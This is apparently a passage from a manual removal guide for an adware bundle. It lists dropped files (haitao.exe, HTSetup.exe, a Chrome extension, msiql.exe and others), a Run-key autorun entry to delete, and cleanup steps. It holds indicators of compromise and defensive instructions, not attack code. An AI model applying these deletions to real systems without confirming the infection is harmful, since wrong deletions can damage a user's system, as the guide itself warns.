    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_close.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowDown.bmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\radio.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\browser.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\uninst_complete.png (784 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsm2DF3.tmp (88249 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\inst_successfully.png (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\haitao.exe (6584 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\manifest.json (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\amazon-de.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\menuButton.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_min.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\Ashford.png (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\background.html (211 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon48_48.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\xmlconfig\install.xml (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\extensionWarn.js (5520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollArrowUp.bmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\btn_alpha.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\box_check.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\popup.html (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\button_setup.png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\mainBk.png (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\chromeNativeClient\chromeht.exe (5520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\scrollBar.bmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\img\gnc.png (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\wtl.exe.manifest (520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\now_start.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\contentscript.js (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTSetup.exe (30344 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\7zxr.dll (3616 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\return.png (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\setting.json (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\htwebHelper.dll (8184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo_text.png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTUninst.exe (25824 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\background.js (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\logo.png (9 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\tap.html (727 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\HTDataView64.dll (12088 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\resource\DirectUI\srollBk.bmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chromeMsg\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon128_128.png (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\res\icon64_64.png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\htyh\extensions\chrome\bncccjepkagemgfhbeknoggaadchfcfb\1.0.2_0\build\tap.js (6360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh6104.tmp (88249 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-R6MIP.tmp\webfriend2.tmp (1429 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\T7QO7T4H.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XSZEUUBG.txt (115 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026566\webfriend2.exe (144837 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026442\20002.exe (143808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe (259462 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026383\20002.exe (143808 bytes)
    %Program Files%\Leawo Commandision\is-KG2HA.tmp (16158 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-9H2MC.tmp\_isetup\_iscrypt.dll (6 bytes)
    %Program Files%\Leawo Commandision\is-NV2MC.tmp (41 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\swapfile.ini (208 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026416\popnew.xml (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp1660aaaaaa (173 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp3536aaaaaa (173 bytes)
    %Program Files%\Leawo Commandision\Leawo Commandision.dll (146 bytes)
    %Program Files%\Leawo Commandision\954872365 (56 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "msiql" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00026403\msiql.exe /RUNNING"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
